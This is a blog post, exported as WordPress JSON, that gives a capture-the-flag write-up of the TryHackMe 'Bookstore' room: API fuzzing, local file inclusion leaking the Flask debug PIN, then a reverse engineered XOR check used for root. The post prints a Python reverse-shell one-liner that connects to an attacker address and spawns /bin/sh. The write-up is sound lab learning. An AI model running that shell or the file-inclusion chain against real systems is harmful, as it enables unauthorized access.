{"id":447,"date":"2025-11-30T10:31:27","date_gmt":"2025-11-30T10:31:27","guid":{"rendered":"https:\/\/hackingwithj.com\/?p=447"},"modified":"2025-11-30T10:41:22","modified_gmt":"2025-11-30T10:41:22","slug":"thm-bookstore","status":"publish","type":"post","link":"https:\/\/hackingwithj.com\/?p=447","title":{"rendered":"THM: Bookstore"},"content":{"rendered":"\n

After several hospital appointments, I finally had time for another CTF. This time I picked Bookstore<\/strong> on TryHackMe, rated as medium and focused on API enumeration \u2014 exactly my thing. Web pentesting is what I enjoy most at the moment, and although I might try bug bounties in the future, that\u2019s still a different league and not something I feel fully ready for yet.<\/p>\n\n\n\n

This machine turned out to be a nice combination of API fuzzing, source code analysis, and Local File Inclusion (LFI).<\/p>\n\n\n\n

NMAP<\/h2>\n\n\n\n

A quick port scan revealed three open ports:<\/p>\n\n\n\n

PORT     STATE SERVICE VERSION\n22\/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 44:0e:60:ab:1e:86:5b:44:28:51:db:3f:9b:12:21:77 (RSA)\n|   256 59:2f:70:76:9f:65:ab:dc:0c:7d:c1:a2:a3:4d:e6:40 (ECDSA)\n|_  256 10:9f:0b:dd:d6:4d:c7:7a:3d:ff:52:42:1d:29:6e:ba (ED25519)\n80\/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-favicon: Unknown favicon MD5: 834559878C5590337027E6EB7D966AEE\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n| http-methods: \n|_  Supported Methods: POST OPTIONS HEAD GET\n|_http-title: Book Store\n5000\/tcp open  http    Werkzeug httpd 0.14.1 (Python 3.6.9)\n| http-methods: \n|_  Supported Methods: HEAD GET OPTIONS\n|_http-server-header: Werkzeug\/0.14.1 Python\/3.6.9\n|_http-title: Home\n| http-robots.txt: 1 disallowed entry \n|_\/api <\/p> \nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\n\n\n
Port 5000 immediately stood out \u2014 Werkzeug usually means Flask<\/strong>.<\/p>\n\n\n\n
HTTP (80)<\/h2>\n\n\n\n
Browsing to port 80 showed a generic web page with no real functionality.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
    \n
  • gobuster<\/code>: no useful directories<\/li>\n\n\n\n
  • ffuf<\/code>: no subdomains<\/li>\n\n\n\n
  • Burp Suite while browsing revealed requests going to:<\/li>\n<\/ul>\n\n\n\n
    \/api\/v2\/resources\/books\/random4<\/code><\/pre>\n\n\n\n
    That looked far more interesting than the static site.<\/p>\n\n\n\n
    API Enumeration (5000)<\/h2>\n\n\n\n
    Navigating to port 5000 gave me a basic page.<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    I immediately ran Gobuster:<\/p>\n\n\n\n
      \n
    • \/api<\/code><\/li>\n\n\n\n
    • \/console<\/code><\/li>\n<\/ul>\n\n\n\n
      Visiting \/console<\/code> showed me a Flask debug console protected by a PIN.<\/p>\n\n\n\n
      \"\"<\/figure>\n\n\n\n
      I could brute-force it\u2026 but before going down that route, I decided to enumerate the API properly first.<\/p>\n\n\n\n
      Visiting \/api<\/code> returned actual API documentation.<\/p>\n\n\n\n
      \"\"<\/figure>\n\n\n\n
      This confirmed I was in the right place. I grabbed a wordlist for fuzzing from GitHub and started attacking \/api\/v2<\/code>. Nothing stood out at first, so I tried older versions.<\/p>\n\n\n\n
      \"\"<\/figure>\n\n\n\n
      The API allowed parameters like:<\/p>\n\n\n\n
        \n
      • id<\/code><\/li>\n\n\n\n
      • author<\/code><\/li>\n\n\n\n
      • published<\/code><\/li>\n<\/ul>\n\n\n\n
        So I fuzzed parameter names to see if something unexpected would pop up.<\/p>\n\n\n\n
        \"\"<\/figure>\n\n\n\n
        One command always crashed the server<\/strong>: show<\/code> Checking the response in Burp showed:<\/p>\n\n\n\n
        \"\"<\/figure>\n\n\n\n
        The error message filename not defined<\/code> immediately suggested a possible LFI vulnerability, so I decided to verify it:<\/p>\n\n\n\n
        \"\"<\/figure>\n\n\n\n
        After digging through HTML source and failing to extract more useful files manually, I turned to HackTricks<\/strong> \u2014 and found two powerful file paths:<\/p>\n\n\n\n
          \n
        • \/proc\/self\/cmdline<\/li>\n\n\n\n
        • \/proc\/self\/environ<\/li>\n<\/ul>\n\n\n\n
          That last file ended up giving me the PIN I needed to unlock the console.<\/p>\n\n\n\n
          \"\"<\/figure>\n\n\n\n
          Going back to \/console<\/code>, I entered the PIN and gained access to the Python execution console.<\/p>\n\n\n\n
          \"\"<\/figure>\n\n\n\n
          I spawned a reverse shell with this one-liner:<\/p>\n\n\n\n
          import socket,os,pty; s=socket.socket(); s.connect((\"IP\",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn(\"\/bin\/sh\")'\n<\/code><\/pre>\n\n\n\n
          Shell access achieved:<\/p>\n\n\n\n
          \"\"<\/figure>\n\n\n\n
          Privilege Escalation<\/h1>\n\n\n\n
          First thing I did after getting a shell was run LinPEAS<\/strong> to get a better overview of the system and spot any obvious privilege escalation vectors. One file immediately stood out in the results:<\/p>\n\n\n\n
          \"\"<\/figure>\n\n\n\n
          Checking its permissions showed something interesting:<\/p>\n\n\n\n
          \"\"<\/figure>\n\n\n\n
          The file was owned by root<\/strong> and executable. Running it launched some kind of custom binary, so rather than blindly executing it further, I decided to inspect it first.<\/p>\n\n\n\n
          Reverse engineering the binary<\/h2>\n\n\n\n
          I downloaded the file to my Kali machine and opened it in Ghidra<\/strong>. Reverse engineering is not my strongest skill, so this took me a bit longer than expected \u2014 but it was a good learning moment. Eventually I discovered the following logic:<\/p>\n\n\n\n
          \"\"<\/figure>\n\n\n\n
          The program calculates a value using this expression:<\/p>\n\n\n\n
          local_14 = 0x5dcd21f4 ^ 0x1116 ^ 0x5db3<\/code><\/pre>\n\n\n\n
          So the \u201cmystery value\u201d was just a simple XOR operation. I quickly decoded it in Python:<\/p>\n\n\n\n
          0x5dcd21f4 ^ 0x1116 ^ 0x5db3<\/code><\/pre>\n\n\n\n
          Output:<\/p>\n\n\n\n
          1573743953<\/code><\/pre>\n\n\n\n
          Root access<\/h2>\n\n\n\n
          At this point I simply ran the binary again and used the decoded value as input.<\/p>\n\n\n\n
          \"\"<\/figure>\n\n\n\n
          While this wasn\u2019t a traditional privilege escalation like abusing sudo permissions or misconfigured cronjobs, it was<\/em> a great hands-on exercise in reverse engineering and understanding how binaries hide secrets. That alone made this part worth it.<\/p>\n\n\n\n
          Learning notes<\/h2>\n\n\n\n
          API Enumeration<\/h3>\n\n\n\n
            \n
          • Always enumerate versioned endpoints: \/v1<\/code>, \/v2<\/code>, \/beta<\/code>, \/old<\/code>.<\/li>\n\n\n\n
          • Try parameter fuzzing, not just paths \u2014 logic bugs often live in parameters.<\/li>\n\n\n\n
          • Read API docs carefully; they often expose more than intended.<\/li>\n\n\n\n
          • If v2 looks secure, try v1 \u2014 backwards compatibility usually means weaker validation.<\/li>\n<\/ul>\n\n\n\n
            Error Handling<\/h3>\n\n\n\n
              \n
            • Treat error messages as information disclosure.<\/li>\n\n\n\n
            • Messages like filename not defined<\/code> often indicate internal file handling.<\/li>\n\n\n\n
            • Application crashes during requests usually mean poor input validation.<\/li>\n\n\n\n
            • Always test parameters hinted by error output.<\/li>\n<\/ul>\n\n\n\n
              Reverse Engineering (Privilege Escalation)<\/h3>\n\n\n\n
                \n
              • Download suspicious binaries and analyze locally.<\/li>\n\n\n\n
              • Start with:\n
                  \n
                • strings<\/code><\/li>\n\n\n\n
                • Ghidra or IDA<\/li>\n<\/ul>\n<\/li>\n\n\n\n
                • Focus on:\n
                    \n
                  • auth checks<\/li>\n\n\n\n
                  • hardcoded values<\/li>\n\n\n\n
                  • XOR routines<\/li>\n\n\n\n
                  • input validation<\/li>\n<\/ul>\n<\/li>\n\n\n\n
                  • Decode logic offline before executing anything on the target.<\/li>\n\n\n\n
                  • Simple obfuscation (XOR) = low-hanging fruit.<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"
                    After several hospital appointments, I finally had time for another CTF. This time I picked Bookstore on TryHackMe, rated as medium and focused on API enumeration \u2014 exactly my thing. Web pentesting is what I enjoy most at the moment, and although I might try bug bounties in the future, that\u2019s still a different league […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[8],"tags":[],"class_list":["post-447","post","type-post","status-publish","format-standard","hentry","category-ctf"],"_links":{"self":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/447","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=447"}],"version-history":[{"count":4,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/447\/revisions"}],"predecessor-version":[{"id":466,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/447\/revisions\/466"}],"wp:attachment":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=447"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=447"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=447"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}